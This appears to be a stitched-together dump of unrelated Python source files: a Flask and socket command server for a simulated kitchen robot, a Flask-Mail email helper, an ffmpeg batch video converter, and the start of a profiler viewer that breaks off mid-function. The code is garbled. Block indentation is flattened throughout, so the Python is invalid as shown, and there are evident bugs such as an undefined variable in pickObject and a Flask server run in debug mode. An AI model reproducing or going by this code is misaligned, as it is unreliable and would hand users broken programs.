@self._flask.route("/abe-sim-command", methods = ['POST'])
def abe_sim_command():
try:
request_data = request.get_json(force=True)
retq = self._interpretSocketCommand(request_data)
except SyntaxError:
retq = json.dumps({'status': 'ill-formed json for command'})
return retq
@self._flask.route("/abe-sim-command/to-get-kitchen", methods = ['POST'])
def to_get_kitchen():
retq = {'status': 'command not recognized', 'response': ''}
try:
request_data = request.get_json(force=True)
varName = request_data['kitchen']
retq['status'] = 'ok'
retq['response'] = {varName: self.cerebellum._retrieveWorldState(forJSON=True)}
except SyntaxError:
retq = {'status': 'ill-formed json for command'}
return json.dumps(retq)
@self._flask.route("/abe-sim-command/to-get-location", methods = ['POST'])
def to_get_location():
retq = {'status': 'ok', 'response': ''}
try:
request_data = request.get_json(force=True)
locationType = request_data['type']
locationVarName = request_data['availableLocation']
kitchenState = request_data['kitchen']
setWorldState = False
if 'setWorldState' in request_data:
setWorldState = request_data['setWorldState']
if setWorldState:
self.cerebellum._setWorldState(kitchenState)
locationName = None
data = self.cerebellum._retrieveWorldState(forJSON=True)
for o in data['worldState'].keys():
if ('props' in data['worldState'][o]) and ('type' in data['worldState'][o]['props']) and (locationType == data['worldState'][o]['props']['type']):
locationName = o
break
retq['response'] = {locationVarName: locationName}
except SyntaxError:
retq = {'status': 'ill-formed json for command'}
return json.dumps(retq)
@self._flask.route("/abe-sim-command/to-fetch", methods = ['POST'])
def to_fetch():
retq = {'status': 'ok', 'response': ''}
try:
request_data = request.get_json(force=True)
kitchenState = request_data['kitchenInputState']
trajector = request_data['object']
supporter = "counterTop1"
setWorldState = False
if 'setWorldState' in request_data:
setWorldState = request_data['setWorldState']
if setWorldState:
self.cerebellum._setWorldState(kitchenState)
objSchemas = self.getObjectSchemas()
trajSchema = objSchemas[trajector].unplace(self.sim3D)
destspec = [Support(supporter=objSchemas[supporter],supportee=trajSchema), trajSchema]
self._lastRequestedAction = False
self.carryObject(trajector, destspec)
with self._robotActionCondition:
self._robotActionCondition.wait()
objectName = trajector
if not self._lastRequestedAction:
objectName = None
worldState = self.cerebellum._retrieveWorldState(forJSON=True)
retq['response'] = {'fetchedObject': objectName, 'kitchenOutputState': worldState}
except KeyError:
retq['status'] = 'missing entries from state data'
return json.dumps(retq)
@self._flask.route("/abe-sim-command/to-transfer", methods = ['POST'])
def to_transfer():
retq = {'status': 'ok', 'response': ''}
try:
request_data = request.get_json(force=True)
kitchenState = request_data['kitchenInputState']
trajector = request_data['input']
supporter = request_data['container']
setWorldState = False
if 'setWorldState' in request_data:
setWorldState = request_data['setWorldState']
if setWorldState:
self.cerebellum._setWorldState(kitchenState)
scene = self.cerebellum._retrieveObjects(fullDump=True)
collisionManager = self.cerebellum._sim3D.space().makeCollisionManager()
for k, v in scene.items():
pose = self.cerebellum._sim3D.space().poseFromTR([scene[k]["position"]["x"], scene[k]["position"]["y"], scene[k]["position"]["z"]], [scene[k]["orientation"]["x"], scene[k]["orientation"]["y"], scene[k]["orientation"]["z"], scene[k]["orientation"]["w"]])
if (k != trajector) and (k in self.cerebellum._volumes.keys()):
collisionManager.add_object(k, self.cerebellum._volumes[k], np.array(pose,dtype=np.double))
objSchemas = self.getObjectSchemas()
trajSchema = objSchemas[trajector].unplace(self.sim3D)
dp = scene[supporter]['position']
dr = scene[supporter]['orientation']
                    arrangement = 'unorderedHeap'
if (supporter in scene) and ('arrangement' in scene[supporter]['props']):
arrangement = scene[supporter]['props']['arrangement']
if arrangement not in ['shelved']:
arrangement = 'unorderedHeap'
targetRegion = self.cerebellum._preferredLocations[supporter].copy().apply_transform(poseFromTQ([dp['x'], dp['y'], dp['z']], [dr['x'], dr['y'], dr['z'], dr['w']]))
trajectorVolume = self.cerebellum._volumes[trajector]
tBox = self.cerebellum._sim3D.space().volumeBounds(trajectorVolume)
if 'shelved' == arrangement:
shelves = trimesh.graph.split(targetRegion)
found = False
for k in range(35):
shelf = shelves[random.randrange(len(shelves))]
bBox = self.cerebellum._sim3D.space().volumeBounds(shelf)
tv = [random.uniform(bBox[i][0] - tBox[i][0], bBox[i][1] - tBox[i][1]) for i in range(2)] + [bBox[2][0] + 0.005-tBox[2][0]]
tTrajector = trajectorVolume.copy().apply_transform(poseFromTQ(tv, [dr['x'], dr['y'], dr['z'], dr['w']]))
if (not collisionManager.in_collision_single(tTrajector, poseFromTQ([0,0,0], [0,0,0,1]))) and (all(targetRegion.contains(tTrajector.vertices))):
trajSchema._parameters["tx"] = tv[0]
trajSchema._parameters["ty"] = tv[1]
trajSchema._parameters["tz"] = tv[2]
trajSchema._parameters["rx"] = dr['x']
trajSchema._parameters["ry"] = dr['y']
trajSchema._parameters["rz"] = dr['z']
trajSchema._parameters["rw"] = dr['w']
trajSchema._parameters["vx"] = 0.0
trajSchema._parameters["vy"] = 0.0
trajSchema._parameters["vz"] = 0.0
trajSchema._parameters["wx"] = 0.0
trajSchema._parameters["wy"] = 0.0
trajSchema._parameters["wz"] = 0.0
found = True
break
elif 'unorderedHeap' == arrangement:
bBox = self.cerebellum._sim3D.space().volumeBounds(targetRegion)
found = False
for k in range(35):
tv = [random.uniform(bBox[i][0] - tBox[i][0], bBox[i][1] - tBox[i][1]) for i in range(3)]
tTrajector = trajectorVolume.copy().apply_transform(poseFromTQ(tv, [dr['x'], dr['y'], dr['z'], dr['w']]))
if (not collisionManager.in_collision_single(tTrajector, poseFromTQ([0,0,0], [0,0,0,1]))) and (all(targetRegion.contains(tTrajector.vertices))):
trajSchema._parameters["tx"] = tv[0]
trajSchema._parameters["ty"] = tv[1]
trajSchema._parameters["tz"] = tv[2]
trajSchema._parameters["rx"] = dr['x']
trajSchema._parameters["ry"] = dr['y']
trajSchema._parameters["rz"] = dr['z']
trajSchema._parameters["rw"] = dr['w']
trajSchema._parameters["vx"] = 0.0
trajSchema._parameters["vy"] = 0.0
trajSchema._parameters["vz"] = 0.0
trajSchema._parameters["wx"] = 0.0
trajSchema._parameters["wy"] = 0.0
trajSchema._parameters["wz"] = 0.0
found = True
break
#destspec = [Support(supporter=objSchemas[supporter],supportee=trajSchema), trajSchema]
destspec = [trajSchema]
self._lastRequestedAction = False
self.carryObject(trajector, destspec)
with self._robotActionCondition:
self._robotActionCondition.wait()
objectName = trajector
if not self._lastRequestedAction:
objectName = None
worldState = self.cerebellum._retrieveWorldState(forJSON=True)
retq['response'] = {'innerContainer': objectName, 'outerContainer': supporter, 'kitchenOutputState': worldState}
except KeyError:
retq['status'] = 'missing entries from state data'
return json.dumps(retq)
@self._flask.route("/abe-sim-command/to-set-kitchen", methods = ['POST'])
def to_set_kitchen():
retq = {'status': 'ok', 'response': ''}
try:
                    # 'data' is not defined in this handler; read the request
                    # body the same way the other routes do.
                    request_data = request.get_json(force=True)
                    self.cerebellum._setWorldState(request_data)
except KeyError:
retq['status'] = 'missing entries from state data'
return json.dumps(retq)
self._flask.run(port=PORTF, debug=True, use_reloader=False)
self._socketThread = threading.Thread(target=thread_function_socket, args=())
self._socketThread.start()
self._flaskThread = threading.Thread(target=thread_function_flask, args=())
self._flaskThread.start()
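    # Minimal client sketch (comment only, assuming the HOST/PORTS/PORTF
    # values defined above and a running Midbrain): send a JSON command over
    # the raw socket, or POST it to the Flask endpoint.
    #
    #   import json, socket
    #   cmd = {"op": "retrieveobjects", "args": {}}
    #   with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    #       s.connect(("127.0.0.1", 65432))
    #       s.sendall((json.dumps(cmd) + "\n").encode("UTF-8"))
    #       print(s.recv(65536).decode("UTF-8"))
    #
    #   # or, equivalently, over HTTP:
    #   # curl -X POST -d '{"op": "hello"}' http://127.0.0.1:54321/abe-sim-command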
def startOperations(self, onNavigationDoneCallback=simpleOnNavigationDoneCallback, onHandsLeftPositioningDoneCallback=simpleHandsLeftPositioningDoneCallback, onHandsRightPositioningDoneCallback=simpleHandsRightPositioningDoneCallback):
self.updateNavigationMap()
self.cerebellum.setCallback("base", onNavigationDoneCallback)
self.cerebellum.setCallback("hands/left", onHandsLeftPositioningDoneCallback)
self.cerebellum.setCallback("hands/right", onHandsRightPositioningDoneCallback)
self.cerebellum.startMonitoring()
self._startSocket()
def navigateToPosition(self, x, y, yaw):
if not self.cellMap:
print("Don't have a navigation map: perhaps startOperation has not been called?")
return False
crPos = self.cerebellum.currentPosition("base")
finPos = {"x": x, "y": y, "yaw": yaw}
timedMap = space.TimedPointGraph(self.cellMap, self.cellMap.graphIngressPoints((crPos["x"], crPos["y"], crPos["yaw"])))
waypoints = timedMap.generatePath((x, y, yaw))
self.cerebellum.clearWaypoints("base")
if waypoints:
waypoints = self._simplifyWaypoints(waypoints)
waypoints.append({"x": x, "y": y, "yaw": yaw})
for wp in waypoints:
self.cerebellum.pushWaypoint("base", wp)
print("On our way!")
return True
print("Target unreachable: out of map, or no clear paths to it.")
return False
def _makeValidator(self, objects, blacklistNames, trajectors):
pathPrefix = os.path.join(os.path.dirname(__file__), "../meshes")
collisionManager = self.sim3D.space().makeCollisionManager()
for oname in objects.keys():
if oname in blacklistNames:
continue
mesh = self.sim3D.space().loadVolume(os.path.join(pathPrefix, objects[oname]["props"]["meshfile"]))
oC = objects[oname]
oCP = [oC["position"]["x"], oC["position"]["y"], oC["position"]["z"]]
oCQ = [oC["orientation"]["x"], oC["orientation"]["y"], oC["orientation"]["z"], oC["orientation"]["w"]]
rP, rQ = self.cerebellum.robotTransform()
invRobT = self.sim3D.space().invertTransform((rP, rQ))
oCP, oCQ = self.sim3D.space().transformTransform(invRobT, (oCP, oCQ))
collisionManager.add_object(oname, mesh, self.sim3D.space().poseFromTR(oCP, oCQ))
return Validator3D(collisionManager, trajectors, self.sim3D.space())
def _interpretDestSpec(self, trajectorName, destSpec):
enet = sg.explicateSchemas(destSpec, self.sim3D)
p = None
q = None
for s in enet.schemas():
if isinstance(s, st.ParameterizedSchema) and ("name" in s._parameters) and (trajectorName == s._parameters["name"]):
p = [0,0,0]
q = [0,0,0,1]
p[0] = s._parameters["tx"]
p[1] = s._parameters["ty"]
p[2] = s._parameters["tz"]
q[0] = s._parameters["rx"]
q[1] = s._parameters["ry"]
q[2] = s._parameters["rz"]
q[3] = s._parameters["rw"]
break
return p, q
def navigateToDestSpec(self, trajectorName, destSpec):
pos, q = self._interpretDestSpec(trajectorName, destSpec)
if not pos:
return False
pathPrefix = os.path.join(os.path.dirname(__file__), "../meshes")
pathAbe = os.path.join(pathPrefix, "abe.2d")
return self.navigateToObject({"name": "aux", "props": {"type": "aux", "meshfile": pathAbe}, "position": {"x": pos[0], "y": pos[1], "z": pos[2]}, "orientation": {"x": q[0], "y": q[1], "z": q[2], "w": q[3]}}, fwd_align=False)
def navigateToObject(self, objectD, fwd_align=True):
pathPrefix = os.path.join(os.path.dirname(__file__), "../meshes")
pathAbe = os.path.join(pathPrefix, "abe.2d")
abe = eo.MiscellaneousRigidObject(name="abe", object_type="agent", mesh=pathAbe)
objectName = ""
if isinstance(objectD,str):
objectName = str(objectD)
objects = self.cerebellum._retrieveObjects()
if not objects or objectD not in objects:
print("Either couldn't retrieve objects, or didn't find %s among them." % objectD)
return False
objectD = objects[objectD]
else:
objectName = objectD["name"]
pathRel = os.path.join(pathPrefix, "%s.2d" % objectD["props"]["meshfile"][:objectD["props"]["meshfile"].rfind(".")])
rel = eo.MiscellaneousRigidObject(name=objectName, object_type=objectD["props"]["type"], mesh=pathRel)
rel._parameters["tx"] = objectD["position"]["x"]
rel._parameters["ty"] = objectD["position"]["y"]
rel._parameters["yaw"] = geom.quaternion_to_euler([objectD["orientation"]["x"], objectD["orientation"]["y"], objectD["orientation"]["z"], objectD["orientation"]["w"]])[0]
rel._parameters["vx"] = 0.0
rel._parameters["vy"] = 0.0
rel._parameters["w"] = 0.0
fdRel = gp.ForwardDirection(obj=rel)
fdAbe = gp.ForwardDirection(obj=abe)
schemas = [(gpr.PointProximity(a=abe, b=rel),0.005), (gpr.AxisPointingTo(axis=fdAbe,point=rel),-math.pi/(4*math.log(0.1)))]
if fwd_align and fdRel.getAxis(self.sim2D):
schemas.append((gpr.AxisCounterAlignment(a=fdAbe, b=fdRel),0.005))
rpd = []
for k in self.cellMap._points.keys():
if self.cellMap._points[k].valid:
x = self.cellMap.pointId2EmbeddingCoordinates(k)
rpd.append([1.0, (x[0], x[1]), (x[2],)])
crPos = self.cerebellum.currentPosition("base")
rpd.append([1.0, (crPos["x"], crPos["y"]), (crPos["yaw"],)])
for s,strictness in schemas:
if "PointProximity" == s._type:
rpd = s.filterPD(rpd, [0,0,0,1], self.sim2D,strictness=strictness)
else:
rpd = s.filterPD(rpd, self.sim2D, strictness=strictness)
maxE = rpd[0]
for e in rpd[1:]:
if maxE[0] < e[0]:
maxE = e
return self.navigateToPosition(maxE[1][0], maxE[1][1], maxE[2][0])
def bringHandToPosition(self, hand, x, y, z, roll, pitch, yaw, objects={}):
if hand not in ["hands/left", "hands/right"]:
print("Only have a left and a right hand.")
return False
if not self.cellMap:
print("Don't have a navigation map: perhaps startOperation has not been called?")
return False
### Function assumes the target position to be given in the robot's local coordinate frame. Therefore, we will need to compute poses
### of world objects in this frame.
crPos = self.cerebellum.currentPosition("base")
crHandPos = self.cerebellum.currentPosition(hand)
finHandPos = {"x": x, "y": y, "z": z, "roll": roll, "pitch": pitch, "yaw": yaw}
pathPrefix = os.path.join(os.path.dirname(__file__), "../meshes")
handVolume = self.sim3D.space().loadVolume(os.path.join(pathPrefix, "Hand.stl"))
blacklistNames = []
trajectors = [[handVolume, [[0,0,0], [0,0,0,1]]]]#geom.euler_to_quaternion([yaw, pitch, roll])]]]
oIHName, oIHTr, oVolume = self.cerebellum.getObjectInHand(hand)
if oIHName:
blacklistNames.append(oIHName)
trajectors.append([oVolume, oIHTr])
validator = self._makeValidator(objects, blacklistNames, trajectors)
resolution = 0.2
xBack = {"hands/left": -0.2, "hands/right": -0.2}
yRight = {"hands/left": -0.6, "hands/right": -1.2}
zDown = {"hands/left": 0, "hands/right": 0}
cellMap = space3D.Grid3D(planes=round(2/resolution), lines=round(2.5/resolution), cols=round(3/resolution), resolution=resolution, xBack=xBack[hand], yRight=yRight[hand], zDown=zDown[hand], gridQ=(0, 0, 0, 1), validator=validator, velocity=1)
timedMap = space.TimedPointGraph(cellMap, cellMap.graphIngressPoints((crHandPos["x"], crHandPos["y"], crHandPos["z"])))
pidDBG = timedMap._pointGraph.embeddingCoordinates2PointId((x,y,z))
waypoints = timedMap.generatePath((x, y, z))
self.cerebellum.clearWaypoints(hand)
if waypoints:
waypoints = [cellMap.pointId2EmbeddingCoordinates(wp) for wp in waypoints]
for wp in waypoints:
self.cerebellum.pushWaypoint(hand, {"x": wp[0], "y": wp[1], "z": wp[2], "roll": roll, "pitch": pitch, "yaw": yaw})
self.cerebellum.pushWaypoint(hand, finHandPos)
print("On our way!")
return True
print("Target unreachable: either too far or no clear paths to it.")
return False
def pickObject(self, objectName):
parkY = {"hands/left": 0.4, "hands/right": -0.4}
hand = self.cerebellum.getFreeHand()
objects = self.cerebellum._retrieveObjects()
if not hand:
print("Both hands busy, can't pick up anything more")
return False
if objectName not in objects:
print("Either couldn't retrieve objects, or didn't find %s among them." % objectD)
return False
if not objects[objectName]["props"]["graspable"]:
print("Object not graspable.")
return False
rP, rQ = self.cerebellum.robotTransform()
o = objects[objectName]
oPW = [o["position"]["x"], o["position"]["y"], o["position"]["z"]]
oQW = [o["orientation"]["x"], o["orientation"]["y"], o["orientation"]["z"], o["orientation"]["w"]]
invRobT = self.sim3D.space().invertTransform((rP, rQ))
oP, oQ = self.sim3D.space().transformTransform(invRobT, (oPW, oQW))
pathPrefix = os.path.join(os.path.dirname(__file__), "../meshes")
volume = self.sim3D.space().loadVolume(os.path.join(pathPrefix, objects[objectName]["props"]["meshfile"]))
handVolume = self.sim3D.space().loadVolume(os.path.join(pathPrefix, "Hand.stl"))
validator = self._makeValidator(objects, [], [[handVolume, [[0,0,0], [0,0,0,1]]]])
radius = self.sim3D.space().boundaryBoxDiameter(self.sim3D.space().volumeBounds(volume))/2.0
if ('particle' in objects[objectName]["props"]) and (objects[objectName]["props"]["particle"]):
radius = radius + 0.1
candidates = []
for x in fibonacci_sphere(samples=40, only_positive_quadrant=True):
c = self.sim3D.space().vectorSum(oP, self.sim3D.space().vectorScale(radius, x))
if validator.isValid(c):
candidates.append(c)
minD = None
minC = None
for c in candidates:
d = self.sim3D.space().vectorNorm(self.sim3D.space().vectorDifference(c, [0, parkY[hand], 0.9]))
if (None == minD) or (minD > d):
minD = d
minC = c
if None == minC:
print("Huh. Couldn't seem to find any point to grasp from.")
return False
x, y, z = minC
def retractFn():
if self.bringHandToPosition(hand, 0, parkY[hand], 0.9, 0, 0, 0, objects=objects):
while True:
if self.cerebellum.haveNoMoreWaypoints(hand):
break
time.sleep(0.05)
return True
with self._robotActionCondition:
self._robotActionCondition.notify_all()
return False
def graspFn():
if self.bringHandToPosition(hand, x, y, z, 0, 0, 0, objects=objects):
while True:
if self.cerebellum.haveNoMoreWaypoints(hand):
break
time.sleep(0.05)
self.cerebellum.grabObject(hand, objectName, volume, self.sim3D.space(), [oPW, oQW], [rP, rQ])
return True
with self._robotActionCondition:
self._robotActionCondition.notify_all()
return False
tasks = self.cerebellum._tasks
tasks.pushTask(retractFn)
tasks.pushTask(graspFn)
return True
def placeObject(self, trajectorName, destinationSpec, hand):
parkY = {"hands/left": 0.4, "hands/right": -0.4}
objects = self.cerebellum._retrieveObjects()
if (hand not in self.cerebellum._handItems) or (trajectorName != self.cerebellum._handItems[hand]):
print("Hand/Object Error: either the hand is not recognized, or it holds another object.")
return False
p, q = self._interpretDestSpec(trajectorName, destinationSpec)
if not p:
print("Could not interpret destspec")
return False
hHP, hHQ = self.sim3D.space().transformTransform((p, q), self.sim3D.space().invertTransform(self.cerebellum._objectInHandTransforms[hand]))
rP, rQ = self.cerebellum.robotTransform()
hP, hQ = self.sim3D.space().transformTransform(self.sim3D.space().invertTransform((rP, rQ)), (hHP, hHQ))
x, y, z = hP
yaw, pitch, roll = geom.quaternion_to_euler(hQ)
def retractFn():
if self.bringHandToPosition(hand, 0, parkY[hand], 0.9, 0, 0, 0, objects=objects):
while True:
if self.cerebellum.haveNoMoreWaypoints(hand):
break
time.sleep(0.05)
print("DONE RETRACT")
self._lastRequestedAction = True
with self._robotActionCondition:
self._robotActionCondition.notify_all()
return True
with self._robotActionCondition:
self._robotActionCondition.notify_all()
return False
def releaseFn():
if self.bringHandToPosition(hand, x, y, z, roll, pitch, yaw, objects=objects):
while True:
if self.cerebellum.haveNoMoreWaypoints(hand):
break
time.sleep(0.05)
self.cerebellum.releaseObject(hand)
print("DONE RELEASE")
return True
with self._robotActionCondition:
self._robotActionCondition.notify_all()
return False
tasks = self.cerebellum._tasks
tasks.pushTask(retractFn)
tasks.pushTask(releaseFn)
return True
def carryObject(self, trajectorName, destinationSpec):
tasks = self.cerebellum._tasks
tasks.clearTasks()
def navFn():
if self.navigateToObject(trajectorName,fwd_align=False):
while True:
if self.cerebellum.haveNoMoreWaypoints("base"):
break
time.sleep(0.05)
return True
with self._robotActionCondition:
self._robotActionCondition.notify_all()
return False
def graspFn():
hand = self.pickObject(trajectorName)
if hand:
while True:
if self.cerebellum.haveNoMoreWaypoints(hand):
break
time.sleep(0.05)
return True
with self._robotActionCondition:
self._robotActionCondition.notify_all()
return False
def nav2Fn():
if self.navigateToDestSpec(trajectorName, destinationSpec):
while True:
if self.cerebellum.haveNoMoreWaypoints("base"):
break
time.sleep(0.05)
return True
with self._robotActionCondition:
self._robotActionCondition.notify_all()
return False
def placeFn():
hand = self.cerebellum.getItemHand(trajectorName)
if hand and self.placeObject(trajectorName, destinationSpec, hand):
while True:
if self.cerebellum.haveNoMoreWaypoints(hand):
break
time.sleep(0.05)
return True
with self._robotActionCondition:
self._robotActionCondition.notify_all()
return False
tasks.appendTask(navFn)
tasks.appendTask(graspFn)
tasks.appendTask(nav2Fn)
tasks.appendTask(placeFn)
with tasks._lock:
if None == tasks._currentTask:
tasks.needsSwitch = True
return True
##### Delete the fns below
def _toWeightedExtension(self, cellMap, location):
retq = {"operation": "weighted-extension", "spec": {}}
if isinstance(location, tuple):
retq["spec"] = {location: 1.0}
elif isinstance(location, list):
retq["spec"] = {l: 1.0 for l in location}
elif isinstance(location, str):
retq["spec"] = self.interpretLocation(cellMap, location)["spec"]
elif isinstance(location, dict):
if "extension" == location["operation"]:
retq["spec"] = {l: 1.0 for l in location["spec"]}
elif "weighted-extension" == location["operation"]:
retq["spec"] = location["spec"]
else:
retq = self.interpretLocation(cellMap, location)
return retq
def interpretLocation(self, cellMap, location):
if isinstance(location, tuple) or isinstance(location, list):
return location
if isinstance(location, str):
objects = self.cerebellum._retrieveObjects()
if location in objects:
return {"operation": "weighted-extension", "spec": {(objects[location]["position"]["x"], objects[location]["position"]["y"], yawId*math.pi/4): 1.0 for yawId in range(8)}}
elif isinstance(location, dict):
if "extension" == location["operation"]:
return location["spec"]
elif "weighted-extension" == location["operation"]:
retq = []
cMax = None
for p, w in location["spec"].items():
if (None == cMax) or (cMax < w):
cMax = w
retq = [p]
elif cMax == w:
retq.append(p)
return retq
elif "near-to" == location["operation"]:
location = self._toWeightedExtension(cellMap, location["spec"])
retq = {"operation": "weighted-extension", "spec": {}}
for g, v in cellMap._points.items():
if v.valid:
gE = tuple(cellMap.pointId2EmbeddingCoordinates(g))
retq["spec"][gE] = 0
for p, w in location["spec"].items():
dx = (p[0] - gE[0])
dy = (p[1] - gE[1])
d = math.sqrt(dx*dx + dy*dy)
if 0.01 < d:
tYaw = math.atan2(dy, dx)
dyaw = 0.1*geom.angle_diff(tYaw, gE[2])
d = math.sqrt(dx*dx + dy*dy + dyaw*dyaw)
retq["spec"][gE] = max(retq["spec"][gE], w*(1.0/(1.0 + d*d)))
return retq
elif "conjunction" == location["operation"]:
locations = [self._toWeightedExtension(cellMap, l) for l in location["spec"]]
retq = {"operation": "weighted-extension", "spec": {}}
if locations:
for p, w in locations[0]["spec"].items():
if 0 == w:
continue
for loc in locations[1:]:
if p in loc["spec"]:
w = min(w, loc["spec"][p])
else:
w = 0
break
if 0 < w:
retq["spec"][p] = w
return retq
elif "disjunction" == location["operation"]:
locations = [self._toWeightedExtension(cellMap, l) for l in location["spec"]]
retq = {"operation": "weighted-extension", "spec": {}}
for l in locations:
for p, w in l["spec"].items():
if p not in retq["spec"]:
retq["spec"][p] = 0
retq["spec"][p] = max(retq["spec"][p], w)
return retq
return None
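    # A hedged illustration of the nested location specs that interpretLocation
    # above can resolve; the object names ("table", "fridge") are hypothetical
    # placeholders, not objects guaranteed to exist in the simulation:
    #
    #     spec = {"operation": "conjunction", "spec": [
    #         {"operation": "near-to", "spec": "table"},
    #         {"operation": "near-to", "spec": "fridge"},
    #     ]}
    #     weights = self.interpretLocation(cellMap, spec)
    #     # -> {"operation": "weighted-extension", "spec": {(x, y, yaw): weight, ...}}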
|
email.py
|
from threading import Thread
from flask import current_app
from flask_mail import Message
from app import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(subject, sender, recipients, text_body, html_body, attachments=None, sync=False):
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
msg.html = html_body
if attachments:
for attachment in attachments:
msg.attach(*attachment)
if sync:
mail.send(msg)
else:
Thread(target=send_async_email, args=(current_app._get_current_object(), msg)).start()
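# Hedged usage sketch (illustrative only; create_app and the addresses below
# are assumptions, not part of this module):
#
#     from app import create_app
#     app = create_app()
#     with app.app_context():
#         send_email(subject="Password reset",
#                    sender="noreply@example.com",
#                    recipients=["user@example.com"],
#                    text_body="Plain-text body",
#                    html_body="<p>HTML body</p>",
#                    sync=True)  # send inline instead of in a background thread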
|
converter.py
|
import ffmpeg
import subprocess
import os
from enum import Enum
from threading import Thread
_MKV_FILE_PATH_FORMAT = 'D:/1-mkv/{:02d}.mkv'
_SUB_FILE_PATH_FORMAT = 'C\\:\\\\1-sub\\\\{:02d}.ass'
_CONVERTING_FOLDER_PATH_FORMAT = 'C:/2-converting/{:02d}/'
_CONVERTING_VIDEO_NAME_FORMAT = 'video.avc'
_CONVERTING_AUDIO_NAME_FORMAT = 'audio.flac'
_CONVERTED_AUDIO_NAME_FORMAT = 'audio.aac'
_OUTPUT_FILE_PATH_FORMAT = 'C:/3-output/{:02d}.mp4'
class ItemStatus(Enum):
Waiting = 1
Processing = 2
Processed = 3
class Item(object):
def __init__(self, index):
self.index = index
self.extraction = ItemStatus.Waiting
self.extraction_thread = None
self.audio_conversion = ItemStatus.Waiting
self.audio_conversion_thread = None
self.merging = ItemStatus.Waiting
self.merging_thread = None
pass
def __str__(self):
return "[index={}, extraction={}, audio={}, merging={}]".format(self.index,
self.extraction,
self.audio_conversion,
self.merging)
def __repr__(self):
return self.__str__()
def extract_from_mkv(index):
print("{} - EXTRACTION...".format(index))
mkv_file_path = _MKV_FILE_PATH_FORMAT.format(index)
converting_folder = _CONVERTING_FOLDER_PATH_FORMAT.format(index)
video_path = converting_folder + _CONVERTING_VIDEO_NAME_FORMAT
audio_path = converting_folder + _CONVERTING_AUDIO_NAME_FORMAT
cmd = ['mkvextract',
mkv_file_path,
'tracks',
'0:{}'.format(video_path),
'1:{}'.format(audio_path)]
subprocess.run(cmd, stdout=open(os.devnull, 'wb'))
pass
def convert_audio(index):
print("{} - EXTRACTION AUDIO".format(index))
converting_folder = _CONVERTING_FOLDER_PATH_FORMAT.format(index)
input_audio_path = converting_folder + _CONVERTING_AUDIO_NAME_FORMAT
output_audio_path = converting_folder + _CONVERTED_AUDIO_NAME_FORMAT
process = (
ffmpeg
.input(input_audio_path)
.output(output_audio_path, acodec='aac')
)
run_process(process)
pass
def merge_video(index):
print("{} - EXTRACTION MERGE...".format(index))
converting_folder = _CONVERTING_FOLDER_PATH_FORMAT.format(index)
input_video_path = converting_folder + _CONVERTING_VIDEO_NAME_FORMAT
input_audio_path = converting_folder + _CONVERTING_AUDIO_NAME_FORMAT
input_sub_path = _SUB_FILE_PATH_FORMAT.format(index)
output_file_path = _OUTPUT_FILE_PATH_FORMAT.format(index)
process = (
ffmpeg
.input(input_video_path,
i=input_audio_path,
vsync=0, hwaccel='cuvid',
vcodec='h264_cuvid')
.output(output_file_path,
acodec='aac', vcodec='h264_nvenc',
crf=10,
vf="ass='{}'".format(input_sub_path))
)
run_process(process)
def run_process(process):
process.run(quiet=True, overwrite_output=True)
# process.run(overwrite_output=True)
pass
def extraction_runner(item_list):
__MAX_NUM_THREAD = 3
num_finished_items = 0
processing_list = []
while num_finished_items < len(item_list):
# Clear completed threads
for item in processing_list:
if not item.extraction_thread.is_alive():
# Mark complete
item.extraction = ItemStatus.Processed
# Remove item from current list
processing_list.remove(item)
# Increase count
num_finished_items += 1
print("{} - EXTRACTION ...".format(item.index))
pass
pass
# Add new threads
for item in item_list:
# Stop adding new thread if reaches __MAX_NUM_THREAD
if len(processing_list) >= __MAX_NUM_THREAD:
break
# Add new thread in order
if item.extraction == ItemStatus.Waiting:
# Create new thread from item
thread = Thread(target=extract_from_mkv, args=[item.index])
thread.start()
# Add thread
item.extraction_thread = thread
# Make item as processing
item.extraction = ItemStatus.Processing
# Add item to processing list
processing_list.append(item)
pass
pass
print("ALL - EXTRACTION finished")
pass
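# Side note (hedged, not part of the original script): extraction_runner() is a
# hand-rolled pool capped at __MAX_NUM_THREAD worker threads. A roughly
# equivalent sketch using the standard library, assuming the same
# extract_from_mkv(index) signature:
#
#     from concurrent.futures import ThreadPoolExecutor
#     with ThreadPoolExecutor(max_workers=3) as pool:
#         pool.map(extract_from_mkv, [item.index for item in item_list])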
def convert_audio_runner(item_list):
num_finished_items = 0
current_item = item_list[0]
# New thread
thread = Thread(target=convert_audio, args=[current_item.index])
thread.start()
# Add thread
current_item.audio_conversion_thread = thread
# Mark processing
current_item.audio_conversion = ItemStatus.Processing
    while num_finished_items < len(item_list):
        if current_item is not None and not current_item.audio_conversion_thread.is_alive():
            # Mark complete
            current_item.audio_conversion = ItemStatus.Processed
            print("{} - AUDIO CONVERSION finished".format(current_item.index))
            # Remove item from current
            current_item = None
            # Increase count
            num_finished_items += 1
        if current_item is None:
            # Start the next item whose extraction has already finished
            for item in item_list:
                if item.extraction == ItemStatus.Processed and item.audio_conversion == ItemStatus.Waiting:
                    # New thread
                    thread = Thread(target=convert_audio, args=[item.index])
                    thread.start()
                    # Add thread
                    item.audio_conversion_thread = thread
                    # Mark processing
                    item.audio_conversion = ItemStatus.Processing
                    # Set to current
                    current_item = item
                    # Break look up
                    break
print("ALL - AUDIO finished")
pass
def main():
start_index = 1
end_index = 48
# items = [Item(i) for i in range(start_index, end_index)]
# print(items)
# extraction_thread = Thread(target=extraction_runner, args=[items])
# extraction_thread.start()
# audio_conversion_thread = Thread(target=convert_audio_runner, args=[items])
# audio_conversion_thread.start()
#
# while extraction_thread.is_alive() or audio_conversion_thread.is_alive():
# pass
# pass
for i in range(start_index, end_index):
extract_from_mkv(i)
merge_video(i)
pass
pass
if __name__ == '__main__':
main()
pass
|
main.py
|
import json
import mimetypes
import os
import pstats
import string
import threading
import webbrowser
from http.server import BaseHTTPRequestHandler, HTTPServer
from .__about__ import __version__
from .module_groups import built_in, built_in_deprecated
try:
from html import escape
except ImportError:
from cgi import escape
class TunaError(Exception):
pass
def read(filename):
_, ext = os.path.splitext(filename)
try:
return read_import_profile(filename)
except (TunaError, StopIteration):
pass
# runtime profile
return read_runtime_profile(filename)
def read_runtime_profile(prof_filename):
stats = pstats.Stats(prof_filename)
# One way of picking the root nodes would be to loop over stats.stats.items() and
# check which doesn't have parents. This, however, doesn't work if there are loops
# in the graph which happens, for example, if exec() is called somewhere in the
# program. For this reason, find all nodes without parents and simply hardcode
# `<built-in method builtins.exec>`.
roots = set([])
for item in stats.stats.items():
